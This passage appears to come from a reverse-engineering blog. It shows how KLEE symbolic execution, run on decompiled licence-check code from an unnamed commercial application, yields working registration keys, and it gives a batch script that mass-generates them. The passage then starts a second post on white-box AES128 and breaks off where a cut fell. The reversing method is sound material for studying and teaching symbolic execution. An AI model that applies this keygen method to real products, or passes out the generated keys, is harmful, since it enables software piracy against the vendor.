KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-5"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 70495424)
KLEE: ERROR: /tmp/klee-uclibc/libc/stdlib/stdlib.c:526: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5756
KLEE: done: completed paths = 68
KLEE: done: generated tests = 68

And KLEE finds the possible out-of-bounds access in our program. Because, you know, our program is bugged :) Before jumping in to fix our code, let me briefly explain what these new flags do:

  • --optimize: this is for dead code elimination. It is actually a good idea to use this flag when working with non-trivial applications, since it speeds things up;
  • --libc=uclibc and --posix-runtime: these are the aforementioned options for uClibc and POSIX runtime;
  • --sym-args 0 1 3: this flag tells KLEE to run the program with a minimum of 0 and a maximum of 1 argument, each of length at most 3, and to make the arguments symbolic.

Note that adding the atoi function to our code adds 68 execution paths to the program. Using many libc functions in our code adds complexity, so we have to use them carefully when we want to reverse complex functions.

Let's now make the program safe by adding a check on the command line argument length. Let's also add an assertion, because it is fun :)

#include <stdlib.h>
#include <assert.h>
#include <klee/klee.h>

int main(int argc, char* argv[]) {
    int result = argc > 1 ? atoi(argv[1]) : 0;
    if (result == 42)
        klee_assert(0);
    return result;
}

We could also have written klee_assert(result != 42) and gotten the same result. No matter which solution we adopt, we now run KLEE as before:

$ clang -emit-llvm -g -o atoi2.ll -c atoi2.c
$ klee --optimize --libc=uclibc --posix-runtime atoi2.ll --sym-args 0 1 3
KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-6"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 53243904)
KLEE: ERROR: /work/atoi2.c:8: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5962
KLEE: done: completed paths = 73
KLEE: done: generated tests = 69

Here we go! We have fixed our bug. KLEE is also able to find an input to make the assertion fail:

$ ls klee-last/ | grep err
test000016.assert.err
$ ktest-tool klee-last/test000016.ktest
ktest file : 'klee-last/test000016.ktest'
args       : ['atoi2.ll', '--sym-args', '0', '1', '3']
num objects: 3
...
object    1: name: 'arg0'
object    1: size: 4
object    1: data: '+42\x00'
...

And the answer is the string "+42"... as we know.

There are many other KLEE options and functionalities, but let's move on and try to solve our original problem. Interested readers can find a good tutorial in, for example, How to Use KLEE to Test GNU Coreutils.

KLEE keygen

Now that we know the basic KLEE commands, we can try to apply them to our particular case. We have understood some of the validation algorithm, but we don't know the computation details. They are just a mess of arithmetical and logical operations that we are tired of analyzing.

Here is our plan:

  • we need at least a valid customer number, a serial number and a mail address;
  • more ambitiously we want a list of them, to make a key generator.

This is a possibility:

// copy and paste of all the registration code
enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;
// ...
enum result_t check_registration(int serial, int customer_num, const char* mail);
// ...

int main(int argc, char* argv[]) {
    int serial, customer, valid;
    char mail[10];
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    klee_make_symbolic(&customer, sizeof(customer), "customer");
    klee_make_symbolic(mail, sizeof(mail), "mail");

    valid = (check_registration(serial, customer, mail) != INVALID);
    valid &= (license_type == PRO);
    klee_assert(!valid);
}

Super simple: copy and paste everything, make the inputs symbolic, and assert the negation of the result we want.

No! It's not that simple. This is actually the most difficult part of the game. First of all, what do we want to copy? We don't have the source code. In my case I used the Hex-Rays decompiler, so maybe I cheated. Even when you decompile, however, you don't immediately get compilable C source code, since there can be dependencies between functions, global variables, and specific Hex-Rays types. For this latter problem I've prepared an ida_defs.h header, providing defines coming from IDA and from the Windows headers.
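
To give you an idea, such a header mostly needs to supply the Hex-Rays integer typedefs and byte-access macros. Here is a small sketch reconstructed from IDA's defs.h conventions, not a verbatim copy of mine:

typedef unsigned char      _BYTE;
typedef unsigned short     _WORD;
typedef unsigned int       _DWORD;
typedef unsigned long long _QWORD;

/* byte/word access macros, assuming a little-endian target */
#define LOBYTE(x) (*((_BYTE*)&(x)))
#define LOWORD(x) (*((_WORD*)&(x)))
#define HIBYTE(x) (*((_BYTE*)&(x) + sizeof(x) - 1))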

But what should we copy? The high-level picture of the validation algorithm I presented is an idealized one. The check_registration function is actually a big set of auxiliary functions and data, tightly coupled with other parts of the program. Even if we now know the most interesting functions, we need to know how much of the related code is actually useful. We cannot throw everything into our key generator, since every function drags in other related data and functions; we would end up with the whole program in it. We need to minimize the code KLEE has to analyze, otherwise it will be too difficult for it to get the job done.

This is a picture of the high level workflow, as IDA proximity view proposes:

Known license functions

and this is the overview for a single node of this schema (precisely license_getType):

license_getType overview

As you can imagine, the complete call graph becomes really big in the end.

A big bunch of the functions removed in the cleanup process were the ones extracting and loading the table of valid mail addresses. To replace them, I stepped with the debugger until the table was completely loaded and then dumped the memory of the process. Then I used the nice "export to C array" feature of Hex Workshop to turn the dumped memory of the mail table into actual code:

uint16_t hashHeader[8192] =
{
    0x0, 0x28, 0x12, 0x24, 0x2d, 0x2b, 0x2e, 0x23, 0x2b, 0x26,
    // ...
};
int32_t hashData[1000000] =
{
    15306, 18899, 18957, -24162, 63045, -26834, -21, -39653, 271441, -5588,
    // ...
};

But cutting out code is not the only problem I found in this step. External constraints must be carefully considered. For example, the time function can be handled by KLEE itself: KLEE tries to generate interesting values even for that function. This is good if we want to test bugs related to a strange current time but, in our case, since the code will be executed by the program at a particular time, we are only interested in the value provided at that time. We don't want KLEE to treat this function as symbolic; we only want the right time value. To solve that problem, I replaced all the calls to time with a my_time function returning a fixed value, defined in the source code.
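
A minimal sketch of that replacement, where FIXED_TIME stands in for the timestamp I actually observed (the value below is a placeholder):

#include <time.h>

#define FIXED_TIME 1438387200 /* placeholder timestamp */

static time_t my_time(time_t *t) {
    if (t)
        *t = (time_t)FIXED_TIME;
    return (time_t)FIXED_TIME;
}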

Another problem comes from the extraction of the functions from their outer context. Often, code is written with implicit conventions in mind. These are not self-evident in the code, because checks are avoided. A trivial example is the null terminator and valid ASCII characters in strings: KLEE does not assume those constraints, but the validation code does, because the GUI provides only valid strings. A less trivial example is that the mail address is always passed lowercase from the GUI to the lower-level application logic. This is not self-evident if you do not follow every step from the user input to the actual computations on the data.

The solution to this latter problem is to provide those constraints to KLEE:

char mail[10];
char c;
int i;
klee_make_symbolic(mail, sizeof(mail), "mail");
for (i = 0; i < sizeof(mail) - 1; ++i) {
    c = mail[i];
    klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '\0' );
}
klee_assume(mail[sizeof(mail) - 1] == '\0');

The operators inside the klee_assume calls are bitwise and not logical (i.e. & and | instead of && and ||) because they are simpler for the engine: they do not add the extra branches required by short-circuit operators.

Throw everything into KLEE

Having extracted all the needed functions and global data and solved all the issues with the code, we can now move on and run KLEE with our brand new test program:

$ clang -emit-llvm -g -o attempt1.ll -c attempt1.c
$ klee --optimize --libc=uclibc --posix-runtime attempt1.ll

And then wait for an answer.

And wait for another while.

Make some coffee, drink it, come back and watch the PC heating up.

Go out, walk around, come back, have a shower, and.... oh no! It's still running! OK, that's enough! Let's kill it.

Deconstruction approach

We have asked too much of the tool. It's time to use our brain and ease its work a little bit.

Let's decompose the big picture of the registration check presented before, piece by piece. We will try to solve it bit by bit, to reduce the solution space and, with it, the complexity.

Recall that the algorithm is composed by three main conditions:

  • serial number must be valid by itself;
  • serial number, combined with mail address, has to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

Can we split them in different KLEE runs?

Clearly the first one can be written as:

#include <assert.h>
#include <klee/klee.h>
// include all the functions extracted from the program
#include "extracted_code.c"

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

int main(int argc, char* argv[]) {
    int serial, valid;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    klee_assert(!valid);
}

And let's see if KLEE can work with this single function:

$ clang -emit-llvm -g -o serial_type.ll -c serial_type.c
$ klee --optimize --libc=uclibc --posix-runtime serial_type.ll
...
KLEE: ERROR: /work/symbolic/serial_type.c:17: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000019.assert.err
$ ktest-tool --write-ints klee-last/test000019.ktest 
ktest file : 'klee-last/test000019.ktest'
args       : ['serial_type.ll']
num objects: 2
object    0: name: 'model_version'
object    0: size: 4
object    0: data: 1
object    1: name: 'serial'
object    1: size: 4
object    1: data: 102690141

Yes! We now have a serial number that is considered PRO by our target application.

The third condition is less simple: we have a table storing values that match mail addresses to serial numbers. The high-level check is this:

int check(int serial, char* mail) {
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table.data[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

This piece of code imposes constraints on our mail address and serial number, but not on the customer number. We can rewrite the check in two parts: one checking the serial, and one checking the mail address:

int check_serial(int serial) {
    int index = get_index_in_mail_table(serial);
    return index <= HEADER_SIZE;
}

int check_mail(char* mail, int index) {
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table.data[index + i] == mail_digest)
            return 1;
    }
    return 0;
}

The check_mail function needs the index into the table as a secondary input, so it is not completely independent from the other check. The check_serial logic, however, can be incorporated into the successful test program used before:

// ...

int main(int argc, char* argv[]) {
    int serial, valid, index;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    // added just now
    index = get_index_in_mail_table(serial);
    valid &= index <= HEADER_SIZE;

    klee_assert(!valid);
}

And if we run it, we get a revised serial number that satisfies the additional constraint:

$ clang -emit-llvm -g -o serial.ll -c serial.c
$ klee --optimize --libc=uclibc --posix-runtime serial.ll
...
KLEE: ERROR: /work/symbolic/serial.c:21: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000032.assert.err
$ ktest-tool --write-ints klee-last/test000032.ktest 
...
object    1: name: 'serial'
object    1: data: 120300641
...

For those wondering whether get_index_in_mail_table could return a negative index, and so possibly crash the program: you are not alone. @0vercl0k asked me the same question and, unfortunately, I have to answer no. Being a lazy ass, I tried by changing the assertion above to klee_assert(index >= 0), but it was never triggered by KLEE. I then manually checked the function's code and saw a beautiful if (result < 0) result = 0. So the answer is no: you have not found a vulnerability in the application :(

For the check_mail solution we have to provide the index derived from a serial, but wait... we have one! Given our serial, computing the table index is as simple as executing this:

int index = get_index_in_mail_table(serial);

Therefore, given a serial number, we can solve the mail address in this way:

// ...

int main(int argc, char* argv[]) {
    int serial, valid, index, i;
    char c;
    char mail[10];

    // mail is symbolic
    klee_make_symbolic(mail, sizeof(mail), "mail");
    for (i = 0; i < sizeof(mail) - 1; ++i)
    {
        c = mail[i];
        klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '\0' );
    }
    klee_assume(mail[sizeof(mail) - 1] == '\0');

    // get serial as external input
    if (argc < 2)
        return 1;
    serial = atoi(argv[1]);

    // compute index
    index = get_index_in_mail_table(serial);
    // check validity
    valid = check_mail(mail, index);
    klee_assert(!valid);
}

We only have to run KLEE with the additional serial argument, providing the serial computed in the previous step.

$ clang -emit-llvm -g -o mail.ll -c mail.c
$ klee --optimize --libc=uclibc --posix-runtime mail.ll 120300641
...
KLEE: ERROR: /work/symbolic/mail.c:34: ASSERTION FAIL: !valid
...
$ ls klee-last/ | grep err
test000023.assert.err
$ ktest-tool klee-last/test000023.ktest 
...
object    1: name: 'mail'
object    1: data: 'yrwt\x00\x00\x00\x00\x00\x00'
...

OK, the mail found by KLEE is "yrwt". This is not a mail address, of course, but the code does not properly validate the presence of the '@' and '.' characters, so we are fine with it :)
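(If you wanted something that at least looks like a mail address, you could simply extend the symbolic alphabet and pin the mandatory characters — a hypothetical tweak to the klee_assume calls above:)

// allow '@' and '.' in the symbolic alphabet...
klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '@' | c == '.' | c == '\0' );
// ...and, for example, force the third character to be the '@' sign
klee_assume(mail[2] == '@');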

The last piece of the puzzle we need is the customer number. Here is the check:

int expected_customer = compute_customer_number(serial, mail);
if (expected_customer != customer_num)
    return INVALID;

This is simpler than before, since we already have a serial and a mail, so the only thing missing is a customer number matching those. We can compute it directly, even without symbolic execution:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{
    if (argc < 3)
        return 1;

    int serial = atoi(argv[1]);
    char* mail = argv[2];
    int customer_number = compute_customer_number(serial, mail);
    printf("%d\n", customer_number);
    return 0;
}

Let's execute it:

$ gcc customer.c -o customer
$ ./customer 120300641 yrwt
1175211979

Yeah! And if we try those numbers and mail address onto the real program, we are now legit and registered users :)

Want more keys?

We have just found one key, and that's cool, but what about making a keygen? KLEE is deterministic, so if you run the same code over and over you will always get the same results. We are stuck with this single serial.

To solve the problem we have to think about what variables we can move around to get different valid serial numbers to start with, and with them solve related mail addresses and compute a customer number.

We have to add constraints to the serial generation, so that each run of a slightly different version of the program yields a different serial number. The simplest thing to do is to constrain get_index_in_mail_table to return an index inside a proper subset of the range [0, HEADER_SIZE] used before. For example we can divide it into equal chunks of size 5 and run the whole thing for every chunk.

This is the modified version of the serial generation:

int main(int argc, char* argv[]) {
    int serial, min_index, max_index, index, valid;

    // serial is symbolic
    klee_make_symbolic(&serial, sizeof(serial), "serial");

    // get chunk bounds as external inputs
    if (argc < 3)
        return 1;
    min_index = atoi(argv[1]);
    max_index = atoi(argv[2]);

    // check and assert
    index = get_index_in_mail_table(serial);
    valid = index >= min_index && index < max_index;
    klee_assert(!valid);
    return 0;
}

We now need a script that runs KLEE and collects the results for all those chunks. Here it is:

#!/bin/bash

MIN_INDEX=0
MAX_INDEX=8033
STEP=5

echo "Index;License;Mail;Customer"

for INDEX in $(seq $MIN_INDEX $STEP $MAX_INDEX); do
    echo -n "$INDEX;"

    CHUNK_MIN=$INDEX
    CHUNK_MAX=$(( CHUNK_MIN + STEP ))
    LICENSE=$(./solve.sh serial.ll $CHUNK_MIN $CHUNK_MAX)
    if [ -z "$LICENSE" ]; then
        echo ";;"
        continue
    fi
    MAIL_ARRAY=$(./solve.sh mail.ll $LICENSE)
    if [ -z "$MAIL_ARRAY" ]; then
        echo ";;"
        continue
    fi
    MAIL=$(sed 's/\\x00//g' <<< $MAIL_ARRAY | sed "s/'//g")
    CUSTOMER=$(./customer $LICENSE $MAIL)

    echo "$LICENSE;$MAIL;$CUSTOMER"
done

This script relies on the solve.sh script, which does the actual work and prints the result of the KLEE runs:

#!/bin/bash
# do work
klee $@ >/dev/null 2>&1
# print result
ASSERT_FILE=$(ls klee-last | grep .assert.err)
TEST_FILE=$(basename klee-last/$ASSERT_FILE .assert.err)
OUTPUT=$(ktest-tool --write-ints klee-last/$TEST_FILE.ktest | grep data)
RESULT=$(sed 's/.*:.*: //' <<< $OUTPUT)
echo $RESULT
# cleanup
rm -rf $(readlink -f klee-last)
rm -f klee-last

Here is the final run:

$ ./keygen_all.sh
Index;License;Mail;Customer
...
2400;;;
2405;115019227;4h79;1162863222
2410;112625605;7cxd;554797040
...

Note that not all the serial numbers are solvable, but we are OK with that. We now have a bunch of solved registrations. We can put them in some simple GUI that exposes one of them to the user at random.

That's all folks.

Conclusion

This was a brief journey into the magic world of reversing and symbolic execution. We started with the dream of making a key generator for a real-world application, and we've got a list of serial numbers to put in some nice GUI (maybe with some MIDI soundtrack playing in the background to make users crazy). But this was not our purpose. The path we followed is far more interesting than ruining a programmer's life. So, just to recap, here are the main steps we followed to generate our serial numbers:

  1. reverse the skeleton of the serial number validation procedure, understanding the data and the most important functions, using a debugger, IDA, and all the reversing tools we can access;
  2. collect the functions and produce a C version of them (this can be quite difficult, unless you have access to the HEX-Rays decompiler or a similar tool);
  3. mark some strategic variables as symbolic and mark some strategic code path with an assert;
  4. ask KLEE to provide the values of the symbolic variables that make the assert fail, and so reach that code path;
  5. since the last step provides only a single serial number, add an external input to the symbolic program, used as an additional constraint, in order to get different values for the symbolic variables reaching the assert.

The last point can seem quite obscure, I admit, but the idea is simple. Since KLEE's goal is to reach a path with some values for the symbolic variables, it is not interested in exploring all the possibilities for those values. We can force this exploration manually by adding an additional constraint and varying a parameter from run to run, getting (hopefully) different correct values for our serial number.

I would like to thank @0vercl0k, @jonathansalwan and @__x86 for their careful proofreading and good remarks!

I hope you found this topic interesting; if you want to deepen some of the arguments touched on in this post, the references linked throughout are a good place to start.

Source code, examples and scripts used to produce this blog post are published in this GitHub repo.

Cheers, @brt_device.

Spotlight on an unprotected AES128 white-box implementation

Introduction

I think it all began when I worked on the NSC2013 crackme made by @elvanderb; long story short, you had a heavily obfuscated AES128 white-box implementation to break. The thing was, you could actually solve the challenge in different ways:

  1. the first one was the easiest one: you didn't need to know anything about white-box, crypto or even AES ; you could just see the function as a black-box & try to find "design flaws" in its inner-workings
  2. the elite way: this one involved understanding & recovering the entire design of the white-box, then identifying design weaknesses that allow the challenger to directly attack & recover the encryption key. A really nice write-up has recently been written by @doegox, check it out, really :): Oppida/NoSuchCon challenge.

The annoying thing is that there isn't a lot of understandable C code available on the web that implements such things; nevertheless you do have quite some nice academic references, and they are a really good resource to build your own.

This post aims to present briefly, in a simple way, what an AES white-box looks like, and to show how important its design is if you don't want your encryption key extracted :). The implementation I'm going to talk about today is not my creation at all; I just followed the first part (might do another post talking about the second part? Who knows) of a really nice paper (even for non-mathematical / crypto guys like me!) written by James A. Muir.

The idea is simple: we will start from a clean AES128 encryption function in plain C, and we will modify it & transform it into a white-box implementation in several steps. As usual, all the code is available on my github account; you are encouraged to break & hack it!

Of course, we will use this post to briefly present what white-box cryptography is, what its goals are & why it's kind of cool.

AES128

Introduction

All right, here we are: this part is just a reminder of how AES (with a 128-bit key) roughly works. If you already know that, feel free to skip to the next part. Basically, in here I just want us to build our first function: a simple block encryption. The signature of the function will be something, as you expect, like this:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])

The encryption works in eleven rounds; the first one & the last one are slightly different from the nine others, but they all rely on four different operations. Those operations are called: AddRoundKey, SubBytes, ShiftRows, MixColumns. Each round modifies a 128-bit state with a 128-bit round-key. Those round-keys are generated from the encryption key by a key expansion (called key schedule) function. Note that the first round-key is actually the encryption key.

The first part of an AES encryption is to execute the key schedule in order to get our round-keys; once we have them all, it's just a matter of applying the four operations we saw to generate the encrypted block.

I know I quite like to see how crypto algorithms work in a visual way; if that's also your case, check out this SWF animation (no exploit in here, don't worry :)): Rijndael_Animation_v4_eng.swf ; otherwise you can also read the FIPS-197 document.

Key schedule

The key schedule is probably the most important part of the algorithm. As I said a bit earlier, it is a derivation function: it takes the encryption key as input and generates, as output, the round-keys the encryption process will use.

I don't really feel like explaining in detail how it works (as it is a bit tricky to explain with words); I would rather advise you to read the FIPS document or to follow the flash animation. Here is what my key schedule looks like:

// aes key schedule
const unsigned char S_box[] = { 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 };
#define DW(x) (*(unsigned int*)(x))
// 8-bit right rotation of a 32-bit word; this is RotWord on our little-endian layout
#define ROT(x) (((x) >> 8) | ((x) << 24))
void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

        // Takes every bytes of `d` & substitute them using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }
}

Sweet. Feel free to dump the round keys and compare them with an official test vector to convince yourself that this thing works. Once we have that function, we need to build the different primitives that the core encryption algorithm will use & reuse to generate the encrypted block. Some of them are like 1 line of C, really simple; some others are a bit more twisted, but whatever.
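For instance, a quick dump like the following is enough (a sketch; the expected value comes from the key-expansion example in FIPS-197 appendix A.1 for the key 2b7e151628aed2a6abf7158809cf4f3c):

// Dump the expanded round-keys; for the FIPS-197 appendix A.1 key,
// round_keys[1] must be a0fafe1788542cb123a339392a6c7605.
for (size_t i = 0; i < 11; ++i)
{
    printf("round_keys[%zu]: ", i);
    for (size_t j = 0; j < 16; ++j)
        printf("%.2x", round_keys[i][j]);
    printf("\n");
}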

Encryption process

Transformations

AddRoundKey

This one is really simple: it takes a round-key (according to the round you are currently in) and the state, & xors every single byte of the state with the corresponding byte of the round-key.

void AddRoundKey(unsigned char roundkey[16], unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] ^= roundkey[i];
}

SubBytes

Another simple one: it takes the state as input & will substitute every byte using the forward substitution box S_box.

void SubBytes(unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] = S_box[out[i]];
}

If you are interested in how the values of the S_box are computed, you should read the following blogpost AES SBox and ParisGP written by my mate @kutioo.

ShiftRows

This operation is a bit more involved, but still fairly straightforward. Imagine that the state is a 4x4 matrix: you just have to left-rotate the second line by 1 byte, the third one by 2 bytes & finally the last one by 3 bytes. This can be done in C like this:

__forceinline void ShiftRows(unsigned char out[16])
{
    // +----+----+----+----+
    // | 00 | 04 | 08 | 12 |
    // +----+----+----+----+
    // | 01 | 05 | 09 | 13 |
    // +----+----+----+----+
    // | 02 | 06 | 10 | 14 |
    // +----+----+----+----+
    // | 03 | 07 | 11 | 15 |
    // +----+----+----+----+
    unsigned char tmp1, tmp2;

    tmp1 = out[1];
    out[1] = out[5];
    out[5] = out[9];
    out[9] = out[13];
    out[13] = tmp1;

    tmp1 = out[2];
    tmp2 = out[6];
    out[2] = out[10];
    out[6] = out[14];
    out[10] = tmp1;
    out[14] = tmp2;

    tmp1 = out[3];
    out[3] = out[15];
    out[15] = out[11];
    out[11] = out[7];
    out[7] = tmp1;
}

MixColumns

I guess this one is the least trivial to implement & understand. But basically it is a "matrix multiplication" (in GF(2^8) though, hence the double-quotes) between 4 bytes of the state (a row matrix) and a fixed 4x4 matrix. That gives you 4 new state bytes, and you do that for every double-word of your state.

Now, I kind of cheated for my implementation: instead of implementing the "weird" multiplication, I figured I could use a pre-computed table instead to avoid all the hassle. Because the fixed matrix has only 3 different values (1, 2 & 3) the final table has a really small memory footprint: 3*0x100 bytes basically (if I'm being honest I even stole this table from @elvanderb's crazy white-box generator).

const unsigned char gmul[3][0x100] = {
